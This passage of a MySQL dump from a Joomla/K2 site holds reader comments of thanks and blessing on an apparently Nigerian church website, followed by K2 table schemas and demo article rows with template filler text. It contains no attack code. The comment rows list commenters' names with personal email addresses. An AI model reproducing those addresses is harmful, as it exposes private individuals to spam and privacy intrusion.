(10, 12, 0, 'Adeola Adeyeri ', '2017-01-04 23:24:34', 'Thank you sir/ma  for this  message. Awesome.', 'deolaadegboyega@yahoo.co.uk ', 'http://www.facebook.com/Candwinteriors', 1),
(11, 10, 0, 'Adeola Adeyeri ', '2017-01-04 23:32:30', 'Thank you sir/ma. Awesome.', 'deolaadegboyega@yahoo.co.uk ', '', 1),
(28, 15, 0, 'Gbemisola', '2017-01-15 21:27:00', 'Thank you Daddy and Mummy, the message is very apt.\r\nE pe fun wa, awa na a pe fun yin', 'olawoyingbemisola@gmail.com', '', 1),
(29, 15, 0, 'Niyi Akindoyin', '2017-01-15 21:53:41', 'This a timely message for the Body of Christ!\r\nWe believers need to keep tabs with this truth!\r\nWhat shall it profit a man if he gains the world and loses his soul?\r\nLets keep sharing this message to all!', 'olaniyiakindoyin@gmail.com', '', 1),
(33, 15, 0, 'pastor Soji Oloyede ', '2017-01-19 04:07:07', 'Good morning daddy and mummy. This is timely and awesome. Thank you sir and ma.', 'soji.oyede@yahoo.com', '', 1),
(52, 20, 0, 'Abimbola Babafemi', '2017-01-29 23:33:21', 'Bless God \r\nAmen', 'Kingboa4@gmail.com', '', 1),
(53, 20, 0, 'Abimbola Babafemi', '2017-01-29 23:34:08', 'Bless God \r\nAmen', 'Kingboa4@gmail.com', '', 1),
(54, 19, 0, 'Anozie Chigozie', '2017-01-30 20:18:20', 'I think the main issue that led to this situation in the Church today is the absence of effective, purposeful and Christ centered leadership. The sheep certainly cannot go beyond their shepherd. It is what Church leaders have sown that we are reaping today in the Church and society. In Christianity, everything rises and falls on the leadership. May God urgently give us Christ minded, effective and selfless leaders. Amen', 'canozie35@gmail.com', '', 1),
(35, 17, 0, 'Joshua', '2017-01-22 17:26:43', 'Thank you sir for the publication', 'Joshuaolumefun@yahoo.com', '', 1),
(36, 17, 0, 'Adewuyi david', '2017-01-22 17:59:23', 'Thank you sir for this', 'davidshine4jesus@gmail.com', '', 1),
(38, 17, 0, 'Pastor Olabode ogundare ', '2017-01-22 21:43:39', 'This is a blessing to me. Thank you sir for making this known unto us.', 'bodeism@yahoo.com ', '', 1),
(39, 17, 0, 'John Damilare ', '2017-01-23 05:32:28', 'Thanks sir for this', 'darejohn770@gmail.com', '', 1),
(40, 17, 0, 'Niyi Akindoyin', '2017-01-23 06:54:26', 'I\'m blessed by this message. Thank you Sir.', 'olaniyiakindoyin@gmail.com', '', 1),
(45, 17, 0, 'Olayiwola Paul Akanni', '2017-01-25 08:49:07', 'Thank you so much sir, May God\'s unction upon your life and ministry increase beyond any limit in Jesus Name. \r\nThis is a wonderful insight. More grace sir', 'paulolayiwola@gmail.com', '', 1),
(62, 12, 0, 'monday bakwo', '2017-02-05 01:18:57', 'Am blessed dady/mummy.\r\nThanks so much.', 'mondaybakwo@gmail.com', '', 1),
(76, 19, 0, 'oluwayemi ', '2017-02-12 22:36:36', 'Thanks for this great and illuminating website. LOIC gave birth to me and fed me with solids which made me to be strong spiritually up till date. God bless Daddy and Mummy.', 'oluwayemitheresa@yahoo.com', '', 1),
(77, 23, 0, 'oluwayemi ', '2017-02-12 22:49:44', 'Thank u Daddy. I\'m blessed today', 'oluwayemitheresa@yahoo.com', '', 1),
(91, 19, 0, 'Falowo  Busayo ', '2017-02-20 11:27:27', 'I want to be the most blessed woman in Christ Jesus our Lord... Amen', 'busayochisu@yahoo.com', '', 1),
(92, 25, 0, 'Tayo', '2017-02-20 15:30:12', 'This message is loaded may the lord grant us the grace to maintain our stand.', 'tayocoker23@hotmail.com', '', 1),
(97, 24, 0, 'Folakemi', '2017-02-24 04:27:00', 'Hmmm....\r\nLord,I receive grace.', 'folorunsofolake7@gmail.com', '', 1);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_extra_fields`
--

CREATE TABLE `y57u5_k2_extra_fields` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `value` text NOT NULL,
  `type` varchar(255) NOT NULL,
  `group` int(11) NOT NULL,
  `published` tinyint(4) NOT NULL,
  `ordering` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_k2_extra_fields`
--

INSERT INTO `y57u5_k2_extra_fields` (`id`, `name`, `value`, `type`, `group`, `published`, `ordering`) VALUES
(1, 'Revision', '[{\"name\":null,\"value\":\"1\",\"target\":null,\"alias\":\"revision\",\"required\":0,\"showNull\":0}]', 'textfield', 1, 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_extra_fields_groups`
--

CREATE TABLE `y57u5_k2_extra_fields_groups` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_k2_extra_fields_groups`
--

INSERT INTO `y57u5_k2_extra_fields_groups` (`id`, `name`) VALUES
(1, 'Information');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_items`
--

CREATE TABLE `y57u5_k2_items` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `alias` varchar(255) DEFAULT NULL,
  `catid` int(11) NOT NULL,
  `published` smallint(6) NOT NULL DEFAULT '0',
  `introtext` mediumtext NOT NULL,
  `fulltext` mediumtext NOT NULL,
  `video` text,
  `gallery` varchar(255) DEFAULT NULL,
  `extra_fields` text CHARACTER SET utf8 COLLATE utf8_unicode_ci,
  `extra_fields_search` text NOT NULL,
  `created` datetime NOT NULL,
  `created_by` int(11) NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL,
  `checked_out` int(10) UNSIGNED NOT NULL,
  `checked_out_time` datetime NOT NULL,
  `modified` datetime NOT NULL,
  `modified_by` int(11) NOT NULL DEFAULT '0',
  `publish_up` datetime NOT NULL,
  `publish_down` datetime NOT NULL,
  `trash` smallint(6) NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `featured` smallint(6) NOT NULL DEFAULT '0',
  `featured_ordering` int(11) NOT NULL DEFAULT '0',
  `image_caption` text NOT NULL,
  `image_credits` varchar(255) NOT NULL,
  `video_caption` text NOT NULL,
  `video_credits` varchar(255) NOT NULL,
  `hits` int(10) UNSIGNED NOT NULL,
  `params` text NOT NULL,
  `metadesc` text NOT NULL,
  `metadata` text NOT NULL,
  `metakey` text NOT NULL,
  `plugins` text NOT NULL,
  `language` char(7) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_k2_items`
--

INSERT INTO `y57u5_k2_items` (`id`, `title`, `alias`, `catid`, `published`, `introtext`, `fulltext`, `video`, `gallery`, `extra_fields`, `extra_fields_search`, `created`, `created_by`, `created_by_alias`, `checked_out`, `checked_out_time`, `modified`, `modified_by`, `publish_up`, `publish_down`, `trash`, `access`, `ordering`, `featured`, `featured_ordering`, `image_caption`, `image_credits`, `video_caption`, `video_credits`, `hits`, `params`, `metadesc`, `metadata`, `metakey`, `plugins`, `language`) VALUES
(1, 'Make that idea your life', 'make-that-idea-your-life', 4, 1, '<p class=\"dropcap\">Do not dwell in the past, do not dream of the future, concentrate the mind on the present moment. Never be bullied into silence. Never allow yourself to be made a victim. Accept no one\'s definition of your life; define yourself.</p>\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n', '\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.</p>\r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', NULL, NULL, '[{\"id\":\"1\",\"value\":\"1\"}]', '1 ', '2013-01-03 00:00:00', 199, '', 0, '0000-00-00 00:00:00', '2016-12-31 18:56:10', 196, '2013-01-03 00:00:00', '0000-00-00 00:00:00', 1, 1, 1, 0, 0, '', '', '', '', 74, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(2, 'Be kind whenever possible', 'be-kind-whenever-possible', 4, 1, '<p class=\"dropcap\">Do not dwell in the past, do not dream of the future, concentrate the mind on the present moment. Never be bullied into silence. Never allow yourself to be made a victim. Accept no one\'s definition of your life; define yourself.</p>\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n', '\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.</p>\r\n<p>[blockquote author=\"unknown\"] Believe in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy. [/blockquote]</p>\r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', NULL, NULL, '[{\"id\":\"1\",\"value\":\"1\"}]', '1 ', '2013-01-02 00:00:00', 199, '', 0, '0000-00-00 00:00:00', '2016-12-31 18:55:46', 196, '2013-01-02 00:00:00', '0000-00-00 00:00:00', 1, 1, 2, 1, 0, '', '', '', '', 129, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(3, 'Copy of Abana Joomla Template Released', 'abana-joomla-template-released', 4, 0, '<p><a data-lightbox=\"group:gallery1\" href=\"images/demo/blog/blog_big_1.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/blog/blog_full_img_1.jpg\" border=\"0\" alt=\"\" /></a></p>\r\n<p><a href=\"http://themeforest.net/item/lighthouse-responsive-joomla-template/3266101?ref=arrowthemes\" target=\"_blank\">Abana Joomla Template</a>is a clean and light design using a blend of bright-colors and mouse-picked textures, which makes it suitable for all kinds of websites especially for e-commerce, business or corporate site. Beulah includes a variety of presets for colors, backgrounds, textures and fonts, making it easy for you to customize the overall style to fit your needs.</p>\r\n<div>', '\r\n<p>The features at a glance are:<br /><br /></p>\r\n<ul class=\"style bullet-1\">\r\n<li>Built using HTML5 /CSS3</li>\r\n<li>10 unique Color Styles</li>\r\n<li>Over 60 HTML Pages included</li>\r\n<li>6 Sliders included</li>\r\n<li>Well Documented</li>\r\n<li>Enhanced jquery integration</li>\r\n<li>Cross browser compatible (IE7, IE8 , IE9, Firefox 3.6 to 8, Chrome, Opera, Safari)</li>\r\n<li>Working contact form with validation and ajax results without reloading page</li>\r\n<li>Filterable Portfolio</li>\r\n<li>Sidebar Navigation Menu</li>\r\n<li>Working newsletter subscription widget without page refresh</li>\r\n<li>Advanced Multi-level dropdown menus</li>\r\n<li>CSS3 buttons (no images used)</li>\r\n<li>CSS3 tags with fallback on older browsers</li>\r\n<li>Inbuilt jquery slider with video support</li>\r\n<li>Styled blog pagination</li>\r\n<li>Multiple Page layout combinations</li>\r\n<li>Multiple Widget Variations</li>\r\n<li>Testimonials widget</li>\r\n<li>Twitter widget</li>\r\n<li>Jquery tooltips</li>\r\n<li>Elegant pricing tables with up to six columns. Get more styles here</li>\r\n<li>Clean, commented code with indents</li>\r\n<li>Form Elements custom UI</li>\r\n<li>CSS3 Font face or google fonts option</li>\r\n<li>Google Map integration with dynamic location pointer</li>\r\n<li>Google Charts – Static and Interactive</li>\r\n<li>Solid typography with lists, content boxes, tables, blockquotes, code blocks, buttons, dropcaps and much more</li>\r\n<li>Block Title color spans</li>\r\n<li>404 Error page included</li>\r\n<li>10 Preset pages</li>\r\n<li>Demo data included</li>\r\n<li>SEO friendly</li>\r\n<li>And much, much more</li>\r\n</ul>\r\n</div>', NULL, NULL, '[]', '', '2013-01-05 08:11:22', 42, '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', 42, '2013-01-03 21:11:30', '0000-00-00 00:00:00', 1, 1, 2, 0, 0, '', '', '', '', 0, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(4, 'Inspiration comes from within', 'inspiration-comes-from-within', 3, 1, '<p class=\"dropcap\">Perhaps travel cannot prevent bigotry, but by demonstrating that all peoples cry, laugh, eat, worry, and die, it can introduce the idea that if we try and understand each other, we may even become friends.</p>\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n', '\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.</p>\r\n<p>[blockquote author=\"unknown\"] Believe in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy. [/blockquote]</p>\r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', NULL, NULL, '[]', '', '2013-01-05 00:00:00', 199, '', 0, '0000-00-00 00:00:00', '2016-12-31 18:51:31', 196, '2013-01-03 00:00:00', '0000-00-00 00:00:00', 1, 1, 1, 0, 0, '', '', '', '', 32, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(5, 'Music is food for the soul', 'music-is-food-for-the-soul', 5, 1, '<p><br /> [audio src=\"images/demo/audio/le_festin.mp3\" type=\"audio/mpeg\"][/audio]</p>\r\n<p class=\"dropcap\">Perhaps travel cannot prevent bigotry, but by demonstrating that all peoples cry, laugh, eat, worry, and die, it can introduce the idea that if we try and understand each other, we may even become friends.</p>\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n', '\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.</p>\r\n<p>[blockquote author=\"unknown\"] Believe in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy. [/blockquote]</p>\r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', NULL, NULL, '[]', '', '2014-07-26 00:00:00', 199, '', 0, '0000-00-00 00:00:00', '2016-12-31 18:54:48', 196, '2014-07-26 00:00:00', '0000-00-00 00:00:00', 1, 1, 1, 0, 0, '', '', '', '', 9, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(6, 'You only live once - Live well', 'you-only-live-once-live-well', 5, 1, '<p><br /> [video width=\"100%\" height=\"420\" poster=\"images/demo/video/movie_bg.png\"] [source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\"][/source] [source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"][/source] [source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"][/source] [/video]</p>\r\n<p class=\"dropcap\">Perhaps travel cannot prevent bigotry, but by demonstrating that all peoples cry, laugh, eat, worry, and die, it can introduce the idea that if we try and understand each other, we may even become friends.</p>\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n', '\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.</p>\r\n<p>[blockquote author=\"unknown\"] Believe in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy. 